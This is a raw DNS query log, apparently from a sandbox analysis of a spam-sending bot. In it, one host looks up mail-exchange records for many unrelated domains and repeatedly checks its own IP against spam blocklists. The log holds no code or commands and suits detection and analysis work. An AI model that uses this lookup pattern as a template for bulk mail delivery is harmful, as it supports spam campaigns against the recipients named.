Sep 5, 2021 15:50:34.998198032 CEST	192.168.2.4	8.8.8.8	0xe493	Standard query (0)	mx2.ik2.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:35.709837914 CEST	192.168.2.4	8.8.8.8	0xdb68	Standard query (0)	dbfestival.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:35.772501945 CEST	192.168.2.4	8.8.8.8	0xc56f	Standard query (0)	alt1.aspmx.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:36.791922092 CEST	192.168.2.4	8.8.8.8	0xe77f	Standard query (0)	dbfletcher.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:36.850723982 CEST	192.168.2.4	8.8.8.8	0x2ffa	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:37.311366081 CEST	192.168.2.4	8.8.8.8	0x80d4	Standard query (0)	dbfs.id.au	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:37.800244093 CEST	192.168.2.4	8.8.8.8	0x1976	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:37.806171894 CEST	192.168.2.4	8.8.8.8	0x5f9c	Standard query (0)	dbgaskill.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:38.178661108 CEST	192.168.2.4	8.8.8.8	0x5ecb	Standard query (0)	mx1.netsolmail.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:39.312001944 CEST	192.168.2.4	8.8.8.8	0xfd67	Standard query (0)	dbgpromotions.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:39.469997883 CEST	192.168.2.4	8.8.8.8	0xd70c	Standard query (0)	mx1.netsolmail.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:39.481036901 CEST	192.168.2.4	8.8.8.8	0x6d8e	Standard query (0)	dbgriffin.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:40.139477015 CEST	192.168.2.4	8.8.8.8	0x45a0	Standard query (0)	d123140a.ess.barracudanetworks.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:40.797545910 CEST	192.168.2.4	8.8.8.8	0x9364	Standard query (0)	mx4.hanmail.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:41.515646935 CEST	192.168.2.4	8.8.8.8	0x7f63	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:41.993977070 CEST	192.168.2.4	8.8.8.8	0x3925	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:42.860815048 CEST	192.168.2.4	8.8.8.8	0x78a7	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:42.861052036 CEST	192.168.2.4	8.8.8.8	0x8adf	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:42.959208012 CEST	192.168.2.4	8.8.8.8	0x1919	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:42.992868900 CEST	192.168.2.4	8.8.8.8	0x51d6	Standard query (0)	dignityhealth.org	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:43.003211021 CEST	192.168.2.4	8.8.8.8	0x6adb	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.053956985 CEST	192.168.2.4	8.8.8.8	0x8eb7	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.081279993 CEST	192.168.2.4	8.8.8.8	0xf99b	Standard query (0)	mxb-00116001.gslb.pphosted.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.163583994 CEST	192.168.2.4	8.8.8.8	0xe6c8	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.205648899 CEST	192.168.2.4	8.8.8.8	0x7daa	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.299626112 CEST	192.168.2.4	8.8.8.8	0x9ba9	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.341866970 CEST	192.168.2.4	8.8.8.8	0xac9	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.548971891 CEST	192.168.2.4	8.8.8.8	0xce30	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.549434900 CEST	192.168.2.4	8.8.8.8	0xda6f	Standard query (0)	conex.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:43.591065884 CEST	192.168.2.4	8.8.8.8	0xcf19	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.641424894 CEST	192.168.2.4	8.8.8.8	0xf8fe	Standard query (0)	mx03.cloud.vadesecure.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.683137894 CEST	192.168.2.4	8.8.8.8	0xa4e4	Standard query (0)	cbs.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:43.767105103 CEST	192.168.2.4	8.8.8.8	0xc6b8	Standard query (0)	mxa-00262c01.gslb.pphosted.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:44.214101076 CEST	192.168.2.4	8.8.8.8	0x41f6	Standard query (0)	lambda.uniform.thefreemail.top	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:45.054908991 CEST	192.168.2.4	8.8.8.8	0xfdfc	Standard query (0)	mx.powered.name	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:45.058203936 CEST	192.168.2.4	8.8.8.8	0xe14e	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:45.061655045 CEST	192.168.2.4	8.8.8.8	0xe5fd	Standard query (0)	mx1.comcast.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:46.115101099 CEST	192.168.2.4	8.8.8.8	0x44e6	Standard query (0)	cox.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:46.186944962 CEST	192.168.2.4	8.8.8.8	0x5593	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:47.423768044 CEST	192.168.2.4	8.8.8.8	0x26f1	Standard query (0)	cxr.mx.a.cloudfilter.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:47.426918983 CEST	192.168.2.4	8.8.8.8	0x3757	Standard query (0)	mx.lycos.com.cust.b.hostedemail.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:47.429729939 CEST	192.168.2.4	8.8.8.8	0x5653	Standard query (0)	icloud.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:47.481234074 CEST	192.168.2.4	8.8.8.8	0xca82	Standard query (0)	mx01.mail.icloud.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:47.609941006 CEST	192.168.2.4	8.8.8.8	0x182d	Standard query (0)	lorentzmeats.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:48.028512955 CEST	192.168.2.4	8.8.8.8	0xd095	Standard query (0)	mx-01-us-east-2.prod.hydra.sophos.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:48.032216072 CEST	192.168.2.4	8.8.8.8	0x5812	Standard query (0)	cxr.mx.a.cloudfilter.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:48.054343939 CEST	192.168.2.4	8.8.8.8	0x68ab	Standard query (0)	yopmail.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:48.122859001 CEST	192.168.2.4	8.8.8.8	0x2831	Standard query (0)	smtp.yopmail.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:48.257764101 CEST	192.168.2.4	8.8.8.8	0x6c12	Standard query (0)	whiskeyiota.webmailious.top	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:48.415390015 CEST	192.168.2.4	8.8.8.8	0x5004	Standard query (0)	mail.webmailious.top	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:49.408790112 CEST	192.168.2.4	8.8.8.8	0x150d	Standard query (0)	syd.catholic.edu.au	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:49.522631884 CEST	192.168.2.4	8.8.8.8	0xca9d	Standard query (0)	microsoft-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:49.533231020 CEST	192.168.2.4	8.8.8.8	0xa704	Standard query (0)	cxr.mx.a.cloudfilter.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:49.533360958 CEST	192.168.2.4	8.8.8.8	0x8637	Standard query (0)	alt1.aspmx.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.178800106 CEST	192.168.2.4	8.8.8.8	0xaab2	Standard query (0)	cxr.mx.a.cloudfilter.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.179205894 CEST	192.168.2.4	8.8.8.8	0xce38	Standard query (0)	metropharm.com.au	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:50.441209078 CEST	192.168.2.4	8.8.8.8	0x22e7	Standard query (0)	cluster1.us.messagelabs.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.451378107 CEST	192.168.2.4	8.8.8.8	0x7a81	Standard query (0)	anntaylor.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:50.510097027 CEST	192.168.2.4	8.8.8.8	0x7b8f	Standard query (0)	mxa-00217301.gslb.pphosted.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.997752905 CEST	192.168.2.4	8.8.8.8	0x1f29	Standard query (0)	flash.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:51.190864086 CEST	192.168.2.4	8.8.8.8	0x1bac	Standard query (0)	ff-ip4-mx-vip2.prodigy.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:51.192403078 CEST	192.168.2.4	8.8.8.8	0x8832	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:51.990339994 CEST	192.168.2.4	8.8.8.8	0xe310	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:52.334709883 CEST	192.168.2.4	8.8.8.8	0x89c2	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:52.335511923 CEST	192.168.2.4	8.8.8.8	0x7960	Standard query (0)	mx01.mail.icloud.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:53.111265898 CEST	192.168.2.4	8.8.8.8	0xca1c	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:53.389683962 CEST	192.168.2.4	8.8.8.8	0x45a	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:53.390420914 CEST	192.168.2.4	8.8.8.8	0xb90e	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.289613962 CEST	192.168.2.4	8.8.8.8	0xbd4c	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.290296078 CEST	192.168.2.4	8.8.8.8	0x6353	Standard query (0)	unicauca.edu.co	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:54.330436945 CEST	192.168.2.4	8.8.8.8	0x7689	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.385627985 CEST	192.168.2.4	8.8.8.8	0xa1dc	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.470638037 CEST	192.168.2.4	8.8.8.8	0x3f94	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.500695944 CEST	192.168.2.4	8.8.8.8	0xae27	Standard query (0)	ASPMX.L.GOOGLE.COM	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.539680004 CEST	192.168.2.4	8.8.8.8	0x491e	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.543868065 CEST	192.168.2.4	8.8.8.8	0xd253	Standard query (0)	rocketmail.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:54.544047117 CEST	192.168.2.4	8.8.8.8	0x10b9	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.582885027 CEST	192.168.2.4	8.8.8.8	0x7129	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.617300034 CEST	192.168.2.4	8.8.8.8	0x89b7	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.629512072 CEST	192.168.2.4	8.8.8.8	0xd3a	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.669959068 CEST	192.168.2.4	8.8.8.8	0xd4e8	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.742993116 CEST	192.168.2.4	8.8.8.8	0xee65	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.907051086 CEST	192.168.2.4	8.8.8.8	0x1e05	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:55.265660048 CEST	192.168.2.4	8.8.8.8	0xd69f	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:55.348583937 CEST	192.168.2.4	8.8.8.8	0x93f	Standard query (0)	pupa.it	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:55.736725092 CEST	192.168.2.4	84.200.69.80	0x200	Standard query (0)	41.52.17.84.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 5, 2021 15:50:55.739480972 CEST	192.168.2.4	8.8.8.8	0x9cc4	Standard query (0)	d314473.a.ess.de.barracudanetworks.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:55.803875923 CEST	192.168.2.4	8.8.8.8	0xc754	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:56.618546009 CEST	192.168.2.4	8.8.8.8	0x7623	Standard query (0)	naver.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:56.662481070 CEST	192.168.2.4	8.8.8.8	0x9807	Standard query (0)	mx2.naver.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:57.770541906 CEST	192.168.2.4	8.8.8.8	0x2e75	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:57.836993933 CEST	192.168.2.4	8.8.8.8	0x9d4a	Standard query (0)	email.cz	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:57.883833885 CEST	192.168.2.4	8.8.8.8	0x7543	Standard query (0)	mx1.seznam.cz	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:00.080027103 CEST	192.168.2.4	8.8.8.8	0x4d2a	Standard query (0)	hamstermail.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:00.082557917 CEST	192.168.2.4	8.8.8.8	0x9714	Standard query (0)	mx1.comcast.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:00.124939919 CEST	192.168.2.4	8.8.8.8	0x924a	Standard query (0)	mx.powered.name	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:00.128361940 CEST	192.168.2.4	8.8.8.8	0xe881	Standard query (0)	microsoft-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:00.756619930 CEST	192.168.2.4	8.8.8.8	0xbb18	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:02.312410116 CEST	192.168.2.4	8.8.8.8	0x28c8	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:02.576666117 CEST	192.168.2.4	8.8.8.8	0xc1f0	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:03.372334957 CEST	192.168.2.4	8.8.8.8	0x1841	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:03.697814941 CEST	192.168.2.4	8.8.8.8	0xf8a	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:04.312743902 CEST	192.168.2.4	8.8.8.8	0x6f6c	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:04.832309008 CEST	192.168.2.4	8.8.8.8	0x63d3	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:04.877715111 CEST	192.168.2.4	8.8.8.8	0x2647	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:04.918401003 CEST	192.168.2.4	8.8.8.8	0xd770	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:04.969520092 CEST	192.168.2.4	8.8.8.8	0x7052	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.058356047 CEST	192.168.2.4	8.8.8.8	0x42c3	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.073227882 CEST	192.168.2.4	8.8.8.8	0x7a1c	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.093647957 CEST	192.168.2.4	8.8.8.8	0x2370	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.164884090 CEST	192.168.2.4	8.8.8.8	0xb2d7	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.258459091 CEST	192.168.2.4	8.8.8.8	0x63ec	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.318047047 CEST	192.168.2.4	8.8.8.8	0x428a	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.358469009 CEST	192.168.2.4	8.8.8.8	0xa8dc	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.395661116 CEST	192.168.2.4	8.8.8.8	0xaf6b	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:06.385868073 CEST	192.168.2.4	8.8.8.8	0xd471	Standard query (0)	mx.interia.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:06.386853933 CEST	192.168.2.4	8.8.8.8	0x7358	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:06.786416054 CEST	192.168.2.4	8.8.8.8	0x7928	Standard query (0)	gmai.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:06.826633930 CEST	192.168.2.4	8.8.8.8	0x713a	Standard query (0)	mail.h-email.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:07.385646105 CEST	192.168.2.4	8.8.8.8	0x2a0	Standard query (0)	mx1.seznam.cz	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:08.600649118 CEST	192.168.2.4	8.8.8.8	0xb35e	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:08.790128946 CEST	192.168.2.4	8.8.8.8	0xf891	Standard query (0)	cegetel.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:08.838411093 CEST	192.168.2.4	8.8.8.8	0x98c0	Standard query (0)	smtp-in.sfr.fr	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:08.961030960 CEST	192.168.2.4	8.8.8.8	0xf29b	Standard query (0)	education.nsw.gov.au	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:09.548003912 CEST	192.168.2.4	8.8.8.8	0x53eb	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:09.548567057 CEST	192.168.2.4	8.8.8.8	0xa2ad	Standard query (0)	vallipartners.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:09.662875891 CEST	192.168.2.4	8.8.8.8	0x2736	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:10.222803116 CEST	192.168.2.4	8.8.8.8	0xcec2	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:10.223277092 CEST	192.168.2.4	8.8.8.8	0x7d27	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:10.259778976 CEST	192.168.2.4	8.8.8.8	0x23a1	Standard query (0)	mail.vallipartners.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:11.054130077 CEST	192.168.2.4	8.8.8.8	0x290c	Standard query (0)	microsoft-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:11.068572044 CEST	192.168.2.4	8.8.8.8	0xa7a4	Standard query (0)	mx4.hanmail.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:11.216650963 CEST	192.168.2.4	8.8.8.8	0xa132	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:11.487245083 CEST	192.168.2.4	8.8.8.8	0x41b8	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:12.057089090 CEST	192.168.2.4	8.8.8.8	0x393a	Standard query (0)	mx-aol.mail.gm0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:12.695168972 CEST	192.168.2.4	8.8.8.8	0x6f5d	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.041690111 CEST	192.168.2.4	8.8.8.8	0x432f	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.068339109 CEST	192.168.2.4	8.8.8.8	0xf5c8	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.298634052 CEST	192.168.2.4	8.8.8.8	0xf841	Standard query (0)	mx01.mail.icloud.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.693953037 CEST	192.168.2.4	8.8.8.8	0x6c3f	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.058022976 CEST	192.168.2.4	8.8.8.8	0xe2a9	Standard query (0)	mx-aol.mail.gm0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.812252045 CEST	192.168.2.4	8.8.8.8	0x6297	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.829772949 CEST	192.168.2.4	8.8.8.8	0xed86	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:15.617867947 CEST	192.168.2.4	8.8.8.8	0xd42	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:15.865572929 CEST	192.168.2.4	8.8.8.8	0xed11	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:15.979696035 CEST	192.168.2.4	8.8.8.8	0xe85c	Standard query (0)	charter.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:15.981467009 CEST	192.168.2.4	8.8.8.8	0xd8e0	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.022510052 CEST	192.168.2.4	8.8.8.8	0xf554	Standard query (0)	mx0.charter.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.055903912 CEST	192.168.2.4	8.8.8.8	0x9636	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.132796049 CEST	192.168.2.4	8.8.8.8	0xfd24	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.179394007 CEST	192.168.2.4	8.8.8.8	0x2009	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.218507051 CEST	192.168.2.4	8.8.8.8	0xdcc	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.259682894 CEST	192.168.2.4	8.8.8.8	0x3169	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.326780081 CEST	192.168.2.4	8.8.8.8	0x2122	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.557687044 CEST	192.168.2.4	8.8.8.8	0x5731	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.594166040 CEST	192.168.2.4	8.8.8.8	0x8e13	Standard query (0)	inkgizmo.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:16.632121086 CEST	192.168.2.4	8.8.8.8	0x319d	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.755762100 CEST	192.168.2.4	8.8.8.8	0x88f9	Standard query (0)	mx1.mailchannels.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.782533884 CEST	192.168.2.4	8.8.8.8	0x765c	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:17.795928001 CEST	192.168.2.4	8.8.8.8	0x8ded	Standard query (0)	mx1.seznam.cz	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:18.979465008 CEST	192.168.2.4	8.8.8.8	0xd833	Standard query (0)	msn.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:19.066425085 CEST	192.168.2.4	8.8.8.8	0x78dc	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:19.072669983 CEST	192.168.2.4	8.8.8.8	0xc7ae	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:19.385061979 CEST	192.168.2.4	8.8.8.8	0x772e	Standard query (0)	mx1.seznam.cz	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:19.628134966 CEST	192.168.2.4	8.8.8.8	0x93f1	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.061203003 CEST	192.168.2.4	8.8.8.8	0x7eed	Standard query (0)	wp.pl	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:20.135145903 CEST	192.168.2.4	8.8.8.8	0xac6	Standard query (0)	mx.wp.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.304503918 CEST	192.168.2.4	8.8.8.8	0x3f21	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.426474094 CEST	192.168.2.4	8.8.8.8	0xdd3	Standard query (0)	mx.wp.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.601094961 CEST	192.168.2.4	8.8.8.8	0x172c	Standard query (0)	mail.h-email.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.604851007 CEST	192.168.2.4	8.8.8.8	0x859a	Standard query (0)	mx.tlen.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.676028967 CEST	192.168.2.4	8.8.8.8	0xf518	Standard query (0)	tlen.pl	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:20.991820097 CEST	192.168.2.4	8.8.8.8	0xb57d	Standard query (0)	mx.tlen.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.088402987 CEST	192.168.2.4	8.8.8.8	0x5954	Standard query (0)	emig.freenet.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.202800035 CEST	192.168.2.4	8.8.8.8	0xa846	Standard query (0)	noos.fr	MX (Mail exchange)	IN (0x0001)
